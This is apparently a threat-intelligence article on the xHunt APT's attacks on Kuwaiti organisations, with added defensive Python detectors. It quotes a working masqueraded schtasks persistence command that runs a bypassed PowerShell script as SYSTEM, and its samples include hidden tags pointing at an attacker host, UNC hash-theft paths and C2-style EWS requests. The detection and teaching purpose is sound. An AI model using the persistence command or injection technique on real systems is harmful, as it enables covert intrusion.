The sophisticated xHunt APT group has launched a series of targeted cyberattacks against organizations in Kuwait, specifically focusing on government, shipping, and transportation sectors. This advanced persistent threat actor, active since 2018, is employing a custom and evolving toolkit, with many of its tools named after characters from the popular anime series “Hunter x Hunter.” The group’s primary objective appears to be cyber-espionage, aiming to infiltrate critical infrastructure and extract sensitive intelligence.
Recent analysis by security researchers has uncovered the methods employed by xHunt, including a novel watering hole technique. The attackers inject hidden HTML tags into compromised government websites; the tags silently direct the visitor's browser to attacker-controlled servers, where the victim is either prompted to download malicious files or has their NTLM (NT LAN Manager) authentication hashes harvested as the browser transparently authenticates to the attacker's host. This passive credential theft gives xHunt a route to unauthorized access and lateral movement inside victim networks while leaving very little for initial-access detections to trigger on.
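The following Python scanner is an added example, not code from the original analysis or the researchers' report. It applies the idea above to a page's HTML: it flags resources the browser fetches with no user interaction (images, iframes, scripts, stylesheets, meta refreshes) that point at a host other than the page's own or at a UNC or file: path, and notes when the element is hidden. The page, hostnames and URLs are constructed for the demonstration.

```python
"""Flag hidden, auto-fetched resources that pull a visitor off-site.
Added example with a constructed page; not code from the original analysis."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attribute the browser fetches with no click, per element type
AUTO_FETCH_ATTR = {"img": "src", "iframe": "src", "script": "src",
                   "link": "href", "object": "data", "embed": "src"}
HIDDEN_STYLE_MARKERS = ("display:none", "visibility:hidden", "opacity:0")


def _is_unc_or_file(url):
    # \\host\share and file:// make browsers that honour them open an SMB
    # session to "host"; the NTLM authentication on that session is what an
    # attacker-run server collects.
    return url.startswith("\\\\") or urlparse(url).scheme.lower() == "file"


def _is_external(url, page_host):
    host = urlparse(url).hostname
    return bool(host) and host.lower() != page_host.lower()


def _is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    if any(marker in style for marker in HIDDEN_STYLE_MARKERS) or "hidden" in attrs:
        return True
    # 0x0 and 1x1 elements are the classic tracking-pixel disguise
    width = attrs.get("width", "").strip().rstrip("px")
    height = attrs.get("height", "").strip().rstrip("px")
    return width in ("0", "1") and height in ("0", "1")


class WateringHoleScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            content = attrs.get("content", "")
            url = content.split("=", 1)[1].strip().strip("'\"") if "url=" in content.lower() else ""
        else:
            url = attrs.get(AUTO_FETCH_ATTR.get(tag, ""), "").strip()
        if not url:
            return
        reasons = []
        if _is_unc_or_file(url):
            reasons.append("unc_or_file")
        elif _is_external(url, self.page_host):
            reasons.append("external_host")
        if not reasons:
            return                      # same-origin resource, nothing to see
        if tag == "meta":
            reasons.append("auto_redirect")
        elif _is_hidden(attrs):
            reasons.append("hidden")
        self.findings.append({"tag": tag, "url": url, "reasons": reasons})


def scan_html(html, page_host):
    """Return every off-site or UNC/file resource the page loads automatically."""
    scanner = WateringHoleScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate same-origin logo plus three injected elements.
SAMPLE_PAGE = """
<html><body>
<img src="https://www.example-gov.test/logo.png" alt="logo">
<img src="http://cdn-update.example-attacker.test/pixel.png" style="display: none">
<iframe src="http://cdn-update.example-attacker.test/dl" width="0" height="0"></iframe>
<img src="\\\\cdn-update.example-attacker.test\\share\\a.png" width="1" height="1">
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, "www.example-gov.test"):
        print(finding)
```

Run it against a copy of each public page on a schedule and diff the findings between runs: an injected tag shows up as a new external or UNC entry, which is a far smaller signal to review than the whole page source.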
xHunt’s Sophisticated Attack Vectors and Custom Backdoors
Beyond watering hole attacks, xHunt is actively exploiting vulnerabilities in publicly facing Microsoft Exchange and Internet Information Services (IIS) web servers. These compromises serve as initial entry points for deploying a range of custom malware. The group’s arsenal includes bespoke backdoors such as “Hisoka” and “Netero,” as well as the “BumbleBee” webshell. These tools enable the attackers to execute arbitrary commands remotely, maintaining a persistent presence within compromised systems.
A particularly noteworthy aspect of xHunt’s operations is the use of Exchange Web Services (EWS) for command and control (C2). According to the reports, the attackers blend C2 into legitimate mail activity by exchanging commands and results as email drafts stored in the Deleted Items folder of a compromised mailbox: nothing is sent, and the backdoor’s traffic on the wire is HTTPS to the organization’s own Exchange server. This is highly effective against traditional monitoring that looks for anomalous outbound connections, because from the network’s point of view the backdoor is just another EWS client.
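Added example, not from the original report: a small Python triage routine for EWS SOAP request bodies, assuming a defender has those bodies from a reverse proxy or request logging in front of /EWS/Exchange.asmx (an assumption; Exchange does not log request bodies by default). It escalates the two operations a drafts-in-Deleted-Items channel needs: a CreateItem with MessageDisposition="SaveOnly" (a draft) saved into deleteditems, and a FindItem over deleteditems filtered on a subject. The sample requests and the subject string are constructed.

```python
"""Triage EWS SOAP request bodies for the drafts-in-Deleted-Items channel.
Added example with constructed requests; not code from the original report."""
import xml.etree.ElementTree as ET

NS = {
    "s": "http://schemas.xmlsoap.org/soap/envelope/",
    "m": "http://schemas.microsoft.com/exchange/services/2006/messages",
    "t": "http://schemas.microsoft.com/exchange/services/2006/types",
}


def _distinguished_folder(op, path):
    fid = op.find(path, NS)
    return fid.get("Id", "").lower() if fid is not None else None


def analyze_ews_request(soap_xml):
    """Return the operation, the folder it targets and any reasons to escalate."""
    root = ET.fromstring(soap_xml)
    op = next(iter(root.find("s:Body", NS)))          # the operation element inside Body
    name = op.tag.rsplit("}", 1)[-1]
    out = {"operation": name, "folder": None, "reasons": []}
    if name == "CreateItem":
        out["folder"] = _distinguished_folder(op, "m:SavedItemFolderId/t:DistinguishedFolderId")
        # SaveOnly means "store as a draft, do not send". Outlook and OWA put drafts in
        # Drafts, so a draft written straight into Deleted Items is the tasking write.
        is_draft = op.get("MessageDisposition", "").lower() == "saveonly"
        if is_draft and out["folder"] == "deleteditems":
            out["reasons"].append("draft_saved_to_deleted_items")
    elif name == "FindItem":
        out["folder"] = _distinguished_folder(op, "m:ParentFolderIds/t:DistinguishedFolderId")
        restriction = op.find("m:Restriction", NS)
        filters_subject = restriction is not None and any(
            f.get("FieldURI") == "item:Subject"
            for f in restriction.iter("{%s}FieldURI" % NS["t"]))
        # Polling Deleted Items for one fixed subject is the read side of the channel.
        if out["folder"] == "deleteditems" and filters_subject:
            out["reasons"].append("subject_filtered_search_of_deleted_items")
    return out


def _envelope(body):
    return ('<s:Envelope xmlns:s="%s" xmlns:m="%s" xmlns:t="%s"><s:Body>%s</s:Body></s:Envelope>'
            % (NS["s"], NS["m"], NS["t"], body))


# Constructed requests; the subject "status-check" is invented for the demo.
SAMPLE_REQUESTS = {
    "user_sends_mail": _envelope(
        '<m:CreateItem MessageDisposition="SendAndSaveCopy">'
        '<m:SavedItemFolderId><t:DistinguishedFolderId Id="sentitems"/></m:SavedItemFolderId>'
        '<m:Items><t:Message><t:Subject>Q3 shipping report</t:Subject></t:Message></m:Items></m:CreateItem>'),
    "user_saves_draft": _envelope(
        '<m:CreateItem MessageDisposition="SaveOnly">'
        '<m:SavedItemFolderId><t:DistinguishedFolderId Id="drafts"/></m:SavedItemFolderId>'
        '<m:Items><t:Message><t:Subject>Re: port schedule</t:Subject></t:Message></m:Items></m:CreateItem>'),
    "operator_tasks_implant": _envelope(
        '<m:CreateItem MessageDisposition="SaveOnly">'
        '<m:SavedItemFolderId><t:DistinguishedFolderId Id="deleteditems"/></m:SavedItemFolderId>'
        '<m:Items><t:Message><t:Subject>status-check</t:Subject></t:Message></m:Items></m:CreateItem>'),
    "implant_polls": _envelope(
        '<m:FindItem Traversal="Shallow"><m:ItemShape><t:BaseShape>IdOnly</t:BaseShape></m:ItemShape>'
        '<m:Restriction><t:IsEqualTo><t:FieldURI FieldURI="item:Subject"/>'
        '<t:FieldURIOrConstant><t:Constant Value="status-check"/></t:FieldURIOrConstant></t:IsEqualTo></m:Restriction>'
        '<m:ParentFolderIds><t:DistinguishedFolderId Id="deleteditems"/></m:ParentFolderIds></m:FindItem>'),
}


def triage(requests):
    """Map request name -> reasons; an empty list means nothing to escalate."""
    return {name: analyze_ews_request(xml)["reasons"] for name, xml in requests.items()}


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_REQUESTS).items():
        print(name, reasons or "ok")
```

The same CreateItem rule catches the implant writing its results back, since that is another SaveOnly draft into Deleted Items. Where request bodies are not available, mailbox audit logging is the fallback: the pattern to look for is EWS client activity that never sends mail yet repeatedly touches Deleted Items on a fixed cadence.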
The ongoing threat posed by the xHunt APT necessitates a proactive approach to cybersecurity. Their ability to adapt and employ custom, stealthy techniques makes them a formidable adversary for organizations, particularly those within the critical infrastructure sectors of Kuwait and potentially neighboring regions.
Persistence and Defense Evasion Mechanisms Employed by xHunt
A core component of xHunt’s operational strategy is its meticulous focus on maintaining persistence within compromised networks. The group relies heavily on the creation of scheduled tasks to ensure their custom PowerShell-based backdoors, such as “TriFive” and “Snugy,” remain active even after a system reboot. These tasks are configured to execute malicious scripts at regular intervals, often every few minutes, providing a consistent foothold for the attackers.
To further enhance their stealth, xHunt employs sophisticated defense evasion tactics. This includes masquerading their malicious files and scheduled tasks to appear as legitimate Windows processes or system components. For example, they have been observed placing payloads in trusted directories and naming scheduled tasks to mimic authorized system utilities. This makes it challenging for security analysts to distinguish between benign and malicious activities within network logs.
One example of their persistence mechanism involves a command like:
schtasks /create /sc MINUTE /mo 5 /tn "Microsoft\Windows\SideShow\SystemDataProvider" /tr "powershell -exec bypass -file C:\Windows\Temp\xpsrchvw.ps1" /ru SYSTEM
This command registers a task whose name mimics the built-in Microsoft\Windows\SideShow task folder, runs it every five minutes as SYSTEM, and launches PowerShell with the execution policy bypassed against a script dropped in C:\Windows\Temp, so the backdoor is relaunched on a fixed cadence with the highest local privilege. Additionally, the group uses SSH tunnels for lateral movement, allowing it to reach further into the compromised network and access additional systems and data without standing out.
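Added example, not the report’s code: Python that scores scheduled-task XML, the form both schtasks /query /xml and the TaskContent field of Security event 4698 carry, for the persistence pattern described above. The two task definitions are constructed; the suspicious one mirrors the schtasks command quoted above, and the benign one is a stock defrag task for contrast. Because the task name mimics a legitimate SideShow component, the scorer judges the action, principal and cadence rather than the name alone, and only counts the Microsoft\Windows\ location as masquerading once the action already looks wrong.

```python
"""Score scheduled-task definitions for xHunt-style persistence.
Added example with constructed task XML; not code from the original report."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_PRINCIPALS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
# Script locations a SYSTEM task has no business loading from (lower-case)
WRITABLE_DIRS = ("c:\\windows\\temp", "\\temp\\", "\\appdata\\", "c:\\programdata", "c:\\users\\public")
BYPASS_FLAGS = ("-exec bypass", "-ep bypass", "-executionpolicy bypass",
                "-w hidden", "-windowstyle hidden", "-enc ", "-encodedcommand")


def _interval_minutes(iso_duration):
    """Task XML repetition interval: PT5M -> 5.0, P1DT2H -> 1560.0, None if absent."""
    m = re.fullmatch(r"P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", iso_duration or "")
    if not m or not any(m.groups()):
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def score_task(task_path, task_xml):
    """Return the reasons a task definition looks like a masqueraded backdoor launcher."""
    root = ET.fromstring(task_xml)
    exe = root.findtext(".//t:Exec/t:Command", default="", namespaces=NS).strip().lower()
    args = root.findtext(".//t:Exec/t:Arguments", default="", namespaces=NS).lower()
    user = root.findtext(".//t:Principal/t:UserId", default="", namespaces=NS).strip().upper()
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=NS)
    reasons = []
    if "powershell" in exe:
        reasons.append("powershell_action")
        if any(flag in args for flag in BYPASS_FLAGS):
            reasons.append("policy_bypass_or_hidden_window")
        if any(d in args for d in WRITABLE_DIRS):
            reasons.append("script_in_writable_dir")
        if user in SYSTEM_PRINCIPALS:
            reasons.append("runs_as_system")
    minutes = _interval_minutes(interval)
    if minutes is not None and minutes <= 15:
        reasons.append("beacon_like_interval")
    # The \Microsoft\Windows\ name is what makes the task blend in; it only
    # counts against the task once the action itself looks wrong.
    if task_path.lower().startswith("\\microsoft\\windows\\") and reasons:
        reasons.append("masquerades_as_microsoft_task")
    return {"task": task_path, "command": exe, "reasons": reasons, "score": len(reasons)}


def hunt(task_defs, threshold=3):
    """task_defs maps task path -> task XML; returns hits, highest score first."""
    hits = [score_task(path, xml) for path, xml in task_defs.items()]
    return sorted((h for h in hits if h["score"] >= threshold), key=lambda h: -h["score"])


TASK_NS = NS["t"]
# Constructed definitions (XML declaration omitted). The first mirrors the
# schtasks command quoted above; the second is a benign built-in task.
SAMPLE_TASKS = {
    "\\Microsoft\\Windows\\SideShow\\SystemDataProvider": f"""
<Task version="1.2" xmlns="{TASK_NS}">
  <Triggers><CalendarTrigger>
    <Repetition><Interval>PT5M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2020-11-01T08:00:00</StartBoundary><Enabled>true</Enabled>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>powershell</Command>
    <Arguments>-exec bypass -file C:\\Windows\\Temp\\xpsrchvw.ps1</Arguments></Exec></Actions>
</Task>""",
    "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag": f"""
<Task version="1.2" xmlns="{TASK_NS}">
  <Triggers><CalendarTrigger><StartBoundary>2020-11-04T01:00:00</StartBoundary>
    <ScheduleByWeek><DaysOfWeek><Wednesday/></DaysOfWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek>
  </CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>""",
}

if __name__ == "__main__":
    for hit in hunt(SAMPLE_TASKS):
        print(hit["task"], hit["score"], hit["reasons"])
```

Feed it the output of schtasks /query /xml across a fleet, or the TaskContent of 4698 events from a SIEM, and baseline the scores: a brand-new task under \Microsoft\Windows\ that scores high is the signal, and the script path it names is the first artifact to pull for analysis.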
The ongoing analysis of the xHunt APT’s activities suggests a continued focus on intelligence gathering and cyber-espionage. Organizations in Kuwait, particularly those in the government and critical infrastructure sectors, should prioritize reviewing their security postures, implementing robust endpoint detection and response (EDR) solutions, and conducting regular security awareness training for their employees. The evolving nature of the group’s tactics underscores the importance of continuous threat intelligence monitoring and adaptive defense strategies to counter such advanced persistent threats.

